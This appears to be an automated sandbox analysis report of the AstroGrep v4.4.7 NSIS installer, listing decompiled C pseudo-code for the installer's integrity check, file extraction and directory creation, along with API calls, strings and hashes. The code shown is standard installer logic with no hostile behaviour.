                                                                                                            				 *0x409018 = _t89;
                                                                                                            				if(_t89 == 0xffffffff) {
                                                                                                            					return "Error launching installer";
                                                                                                            				}
                                                                                                            				_t92 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                                                            				E00405D2F("C:\\Users\\hardz\\AppData\\Local\\Temp", _t91);
                                                                                                            				E00405D2F(0x436000, E004057E8(_t92));
                                                                                                            				_t50 = GetFileSize(_t89, 0);
                                                                                                            				__eflags = _t50;
                                                                                                            				 *0x420424 = _t50;
                                                                                                            				_t93 = _t50;
                                                                                                            				if(_t50 <= 0) {
                                                                                                            					L24:
                                                                                                            					E00402C02(1);
                                                                                                            					__eflags =  *0x42e414 - _t82;
                                                                                                            					if( *0x42e414 == _t82) {
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					__eflags = _v8 - _t82;
                                                                                                            					if(_v8 == _t82) {
                                                                                                            						L28:
                                                                                                            						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                                            						_t94 = _t53;
                                                                                                            						E004030C7( *0x42e414 + 0x1c);
                                                                                                            						_push(_v24);
                                                                                                            						_push(_t94);
                                                                                                            						_push(_t82);
                                                                                                            						_push(0xffffffff); // executed
                                                                                                            						_t57 = E00402E9F(); // executed
                                                                                                            						__eflags = _t57 - _v24;
                                                                                                            						if(_t57 == _v24) {
                                                                                                            							__eflags = _v44 & 0x00000001;
                                                                                                            							 *0x42e410 = _t94;
                                                                                                            							 *0x42e418 =  *_t94;
                                                                                                            							if((_v44 & 0x00000001) != 0) {
                                                                                                            								 *0x42e41c =  *0x42e41c + 1;
                                                                                                            								__eflags =  *0x42e41c;
                                                                                                            							}
                                                                                                            							_t40 = _t94 + 0x44; // 0x44
                                                                                                            							_t59 = _t40;
                                                                                                            							_t85 = 8;
                                                                                                            							do {
                                                                                                            								_t59 = _t59 - 8;
                                                                                                            								 *_t59 =  *_t59 + _t94;
                                                                                                            								_t85 = _t85 - 1;
                                                                                                            								__eflags = _t85;
                                                                                                            							} while (_t85 != 0);
                                                                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                                            							 *(_t94 + 0x3c) = _t60;
                                                                                                            							E0040595D(0x42e420, _t94 + 4, 0x40);
                                                                                                            							__eflags = 0;
                                                                                                            							return 0;
                                                                                                            						}
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					E004030C7( *0x414418);
                                                                                                            					_t65 = E004030B1( &_a4, 4);
                                                                                                            					__eflags = _t65;
                                                                                                            					if(_t65 == 0) {
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					__eflags = _v12 - _a4;
                                                                                                            					if(_v12 != _a4) {
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					goto L28;
                                                                                                            				} else {
                                                                                                            					do {
                                                                                                            						_t90 = _t93;
                                                                                                            						asm("sbb eax, eax");
                                                                                                            						_t70 = ( ~( *0x42e414) & 0x00007e00) + 0x200;
                                                                                                            						__eflags = _t93 - _t70;
                                                                                                            						if(_t93 >= _t70) {
                                                                                                            							_t90 = _t70;
                                                                                                            						}
                                                                                                            						_t71 = E004030B1(0x420428, _t90);
                                                                                                            						__eflags = _t71;
                                                                                                            						if(_t71 == 0) {
                                                                                                            							E00402C02(1);
                                                                                                            							L29:
                                                                                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                            						}
                                                                                                            						__eflags =  *0x42e414;
                                                                                                            						if( *0x42e414 != 0) {
                                                                                                            							__eflags = _a4 & 0x00000002;
                                                                                                            							if((_a4 & 0x00000002) == 0) {
                                                                                                            								E00402C02(0);
                                                                                                            							}
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						E0040595D( &_v44, 0x420428, 0x1c);
                                                                                                            						_t77 = _v44;
                                                                                                            						__eflags = _t77 & 0xfffffff0;
                                                                                                            						if((_t77 & 0xfffffff0) != 0) {
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						__eflags = _v40 - 0xdeadbeef;
                                                                                                            						if(_v40 != 0xdeadbeef) {
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						__eflags = _v28 - 0x74736e49;
                                                                                                            						if(_v28 != 0x74736e49) {
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						__eflags = _v32 - 0x74666f73;
                                                                                                            						if(_v32 != 0x74666f73) {
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						__eflags = _v36 - 0x6c6c754e;
                                                                                                            						if(_v36 != 0x6c6c754e) {
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						_a4 = _a4 | _t77;
                                                                                                            						_t87 =  *0x414418; // 0xe817a
                                                                                                            						 *0x42e4a0 =  *0x42e4a0 | _a4 & 0x00000002;
                                                                                                            						_t80 = _v20;
                                                                                                            						__eflags = _t80 - _t93;
                                                                                                            						 *0x42e414 = _t87;
                                                                                                            						if(_t80 > _t93) {
                                                                                                            							goto L29;
                                                                                                            						}
                                                                                                            						__eflags = _a4 & 0x00000008;
                                                                                                            						if((_a4 & 0x00000008) != 0) {
                                                                                                            							L16:
                                                                                                            							_v8 = _v8 + 1;
                                                                                                            							_t24 = _t80 - 4; // 0x409194
                                                                                                            							_t93 = _t24;
                                                                                                            							__eflags = _t90 - _t93;
                                                                                                            							if(_t90 > _t93) {
                                                                                                            								_t90 = _t93;
                                                                                                            							}
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						__eflags = _a4 & 0x00000004;
                                                                                                            						if((_a4 & 0x00000004) != 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						goto L16;
                                                                                                            						L20:
                                                                                                            						__eflags = _t93 -  *0x420424; // 0xe817e
                                                                                                            						if(__eflags < 0) {
                                                                                                            							_v12 = E0040613D(_v12, 0x420428, _t90);
                                                                                                            						}
                                                                                                            						 *0x414418 =  *0x414418 + _t90;
                                                                                                            						_t93 = _t93 - _t90;
                                                                                                            						__eflags = _t93;
                                                                                                            					} while (_t93 > 0);
                                                                                                            					_t82 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					goto L24;
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x00000000
                                                                                                            0x00402e3c
                                                                                                            0x00402df6
                                                                                                            0x00402e01
                                                                                                            0x00402e06
                                                                                                            0x00402e08
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402e0d
                                                                                                            0x00402e10
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402cf4
                                                                                                            0x00402cf9
                                                                                                            0x00402cfe
                                                                                                            0x00402d02
                                                                                                            0x00402d09
                                                                                                            0x00402d0e
                                                                                                            0x00402d10
                                                                                                            0x00402d12
                                                                                                            0x00402d12
                                                                                                            0x00402d16
                                                                                                            0x00402d1b
                                                                                                            0x00402d1d
                                                                                                            0x00402e47
                                                                                                            0x00402e3e
                                                                                                            0x00000000
                                                                                                            0x00402e3e
                                                                                                            0x00402d23
                                                                                                            0x00402d2a
                                                                                                            0x00402da6
                                                                                                            0x00402daa
                                                                                                            0x00402dae
                                                                                                            0x00402db3
                                                                                                            0x00000000
                                                                                                            0x00402daa
                                                                                                            0x00402d33
                                                                                                            0x00402d38
                                                                                                            0x00402d3b
                                                                                                            0x00402d40
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d42
                                                                                                            0x00402d49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d4b
                                                                                                            0x00402d52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d54
                                                                                                            0x00402d5b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d5d
                                                                                                            0x00402d64
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d66
                                                                                                            0x00402d6c
                                                                                                            0x00402d75
                                                                                                            0x00402d7b
                                                                                                            0x00402d7e
                                                                                                            0x00402d80
                                                                                                            0x00402d86
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d8c
                                                                                                            0x00402d90
                                                                                                            0x00402d98
                                                                                                            0x00402d98
                                                                                                            0x00402d9b
                                                                                                            0x00402d9b
                                                                                                            0x00402d9e
                                                                                                            0x00402da0
                                                                                                            0x00402da2
                                                                                                            0x00402da2
                                                                                                            0x00000000
                                                                                                            0x00402da0
                                                                                                            0x00402d92
                                                                                                            0x00402d96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402db4
                                                                                                            0x00402db4
                                                                                                            0x00402dba
                                                                                                            0x00402dc6
                                                                                                            0x00402dc6
                                                                                                            0x00402dc9
                                                                                                            0x00402dcf
                                                                                                            0x00402dd1
                                                                                                            0x00402dd1
                                                                                                            0x00402dd9
                                                                                                            0x00402dd9
                                                                                                            0x00000000
                                                                                                            0x00402dd9

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,00000400), ref: 00402C93
                                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004059A6
                                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 00402CDF
                                                                                                            Strings
                                                                                                            • Inst, xrefs: 00402D4B
                                                                                                            • Null, xrefs: 00402D5D
                                                                                                            • Error launching installer, xrefs: 00402CB6
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                                            • C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                                            • soft, xrefs: 00402D54
                                                                                                            • "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" , xrefs: 00402C66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                            • API String ID: 4283519449-3703063560
                                                                                                            • Opcode ID: b279afc3802d50bf57e9722da1946117fb0678ac622cf15a6dcee51f72b17406
                                                                                                            • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                                            • Opcode Fuzzy Hash: b279afc3802d50bf57e9722da1946117fb0678ac622cf15a6dcee51f72b17406
                                                                                                            • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 60%
                                                                                                            			E00401751(FILETIME* __ebx, void* __eflags) {
                                                                                                            				void* _t33;
                                                                                                            				void* _t41;
                                                                                                            				void* _t43;
                                                                                                            				FILETIME* _t49;
                                                                                                            				FILETIME* _t62;
                                                                                                            				void* _t64;
                                                                                                            				signed int _t70;
                                                                                                            				FILETIME* _t71;
                                                                                                            				FILETIME* _t75;
                                                                                                            				signed int _t77;
                                                                                                            				void* _t80;
                                                                                                            				CHAR* _t82;
                                                                                                            				void* _t85;
                                                                                                            
                                                                                                            				_t75 = __ebx;
                                                                                                            				_t82 = E00402A3A(0x31);
                                                                                                            				 *(_t85 - 8) = _t82;
                                                                                                            				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                                            				_t33 = E0040580E(_t82);
                                                                                                            				_push(_t82);
                                                                                                            				if(_t33 == 0) {
                                                                                                            					lstrcatA(E004057A1(E00405D2F(0x409410, "C:\\Program Files (x86)\\AstroGrep")), ??);
                                                                                                            				} else {
                                                                                                            					_push(0x409410);
                                                                                                            					E00405D2F();
                                                                                                            				}
                                                                                                            				E00405F9A(0x409410);
                                                                                                            				while(1) {
                                                                                                            					__eflags =  *(_t85 + 8) - 3;
                                                                                                            					if( *(_t85 + 8) >= 3) {
                                                                                                            						_t64 = E00406033(0x409410);
                                                                                                            						_t77 = 0;
                                                                                                            						__eflags = _t64 - _t75;
                                                                                                            						if(_t64 != _t75) {
                                                                                                            							_t71 = _t64 + 0x14;
                                                                                                            							__eflags = _t71;
                                                                                                            							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                                            						}
                                                                                                            						asm("sbb eax, eax");
                                                                                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                            						__eflags = _t70;
                                                                                                            						 *(_t85 + 8) = _t70;
                                                                                                            					}
                                                                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                                                                            					if( *(_t85 + 8) == _t75) {
                                                                                                            						E0040597D(0x409410);
                                                                                                            					}
                                                                                                            					__eflags =  *(_t85 + 8) - 1;
                                                                                                            					_t41 = E004059A2(0x409410, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                            					__eflags = _t41 - 0xffffffff;
                                                                                                            					 *(_t85 - 0xc) = _t41;
                                                                                                            					if(_t41 != 0xffffffff) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                                                                            					if( *(_t85 + 8) != _t75) {
                                                                                                            						E00404F48(0xffffffe2,  *(_t85 - 8));
                                                                                                            						__eflags =  *(_t85 + 8) - 2;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                            						}
                                                                                                            						L31:
                                                                                                            						 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t85 - 4));
                                                                                                            						__eflags =  *0x42e488;
                                                                                                            						goto L32;
                                                                                                            					} else {
                                                                                                            						E00405D2F(0x409c10, 0x42f000);
                                                                                                            						E00405D2F(0x42f000, 0x409410);
                                                                                                            						E00405D51(_t75, 0x409c10, 0x409410, "C:\Users\hardz\AppData\Local\Temp\nsq211B.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                                            						E00405D2F(0x42f000, 0x409c10);
                                                                                                            						_t62 = E00405525("C:\Users\hardz\AppData\Local\Temp\nsq211B.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                                            						__eflags = _t62;
                                                                                                            						if(_t62 == 0) {
                                                                                                            							continue;
                                                                                                            						} else {
                                                                                                            							__eflags = _t62 == 1;
                                                                                                            							if(_t62 == 1) {
                                                                                                            								 *0x42e488 =  &( *0x42e488->dwLowDateTime);
                                                                                                            								L32:
                                                                                                            								_t49 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            							} else {
                                                                                                            								_push(0x409410);
                                                                                                            								_push(0xfffffffa);
                                                                                                            								E00404F48();
                                                                                                            								L29:
                                                                                                            								_t49 = 0x7fffffff;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L33:
                                                                                                            					return _t49;
                                                                                                            				}
                                                                                                            				E00404F48(0xffffffea,  *(_t85 - 8)); // executed
                                                                                                            				 *0x42e4b4 =  *0x42e4b4 + 1;
                                                                                                            				_push(_t75);
                                                                                                            				_push(_t75);
                                                                                                            				_push( *(_t85 - 0xc));
                                                                                                            				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                                                                            				_t43 = E00402E9F(); // executed
                                                                                                            				 *0x42e4b4 =  *0x42e4b4 - 1;
                                                                                                            				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                                            				_t80 = _t43;
                                                                                                            				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                                            					L22:
                                                                                                            					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                                            				} else {
                                                                                                            					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                                            					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                                            						goto L22;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                                                                            				__eflags = _t80 - _t75;
                                                                                                            				if(_t80 >= _t75) {
                                                                                                            					goto L31;
                                                                                                            				} else {
                                                                                                            					__eflags = _t80 - 0xfffffffe;
                                                                                                            					if(_t80 != 0xfffffffe) {
                                                                                                            						E00405D51(_t75, _t80, 0x409410, 0x409410, 0xffffffee);
                                                                                                            					} else {
                                                                                                            						E00405D51(_t75, _t80, 0x409410, 0x409410, 0xffffffe9);
                                                                                                            						lstrcatA(0x409410,  *(_t85 - 8));
                                                                                                            					}
                                                                                                            					_push(0x200010);
                                                                                                            					_push(0x409410);
                                                                                                            					E00405525();
                                                                                                            					goto L29;
                                                                                                            				}
                                                                                                            				goto L33;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Program Files (x86)\AstroGrep,00000000,00000000,00000031), ref: 00401790
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Program Files (x86)\AstroGrep,00000000,00000000,00000031), ref: 004017BA
                                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,AstroGrep v4.4.7 Setup,NSIS Error), ref: 00405D3C
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Program Files (x86)\AstroGrep$C:\Users\user\AppData\Local\Temp\nsq211B.tmp$C:\Users\user\AppData\Local\Temp\nsq211B.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-2150090298
                                                                                                            • Opcode ID: 1ad589e704bad48cb4130d124ba426fde029c0c3fa9ab524d7428522585685e4
                                                                                                            • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                            • Opcode Fuzzy Hash: 1ad589e704bad48cb4130d124ba426fde029c0c3fa9ab524d7428522585685e4
                                                                                                            • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00404F48(CHAR* _a4, CHAR* _a8) {
                                                                                                            				struct HWND__* _v8;
                                                                                                            				signed int _v12;
                                                                                                            				CHAR* _v32;
                                                                                                            				long _v44;
                                                                                                            				int _v48;
                                                                                                            				void* _v52;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				CHAR* _t26;
                                                                                                            				signed int _t27;
                                                                                                            				CHAR* _t28;
                                                                                                            				long _t29;
                                                                                                            				signed int _t39;
                                                                                                            
                                                                                                            				_t26 =  *0x42dbe4; // 0x40266
                                                                                                            				_v8 = _t26;
                                                                                                            				if(_t26 != 0) {
                                                                                                            					_t27 =  *0x42e4b4;
                                                                                                            					_v12 = _t27;
                                                                                                            					_t39 = _t27 & 0x00000001;
                                                                                                            					if(_t39 == 0) {
                                                                                                            						E00405D51(0, _t39, 0x429048, 0x429048, _a4);
                                                                                                            					}
                                                                                                            					_t26 = lstrlenA(0x429048);
                                                                                                            					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42dbc8, 0x429048); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429048;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429048)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429048, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

APIs
• lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
• lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
• lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
• SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
Strings
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\
• API String ID: 2531174081-1207206035
• Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
• Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
• Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
• Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040540E(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407374;
				_v36.Group = 0x407374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

APIs
• CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
• GetLastError.KERNEL32 ref: 00405465
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
• GetLastError.KERNEL32 ref: 00405484
Strings
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$ds@$ts@
• API String ID: 3449924974-816313341
• Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
• Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
• Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
• Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E00402E9F(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x418420;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004030C7( *0x42e458 + _t62);
				}
				if(E004030B1( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
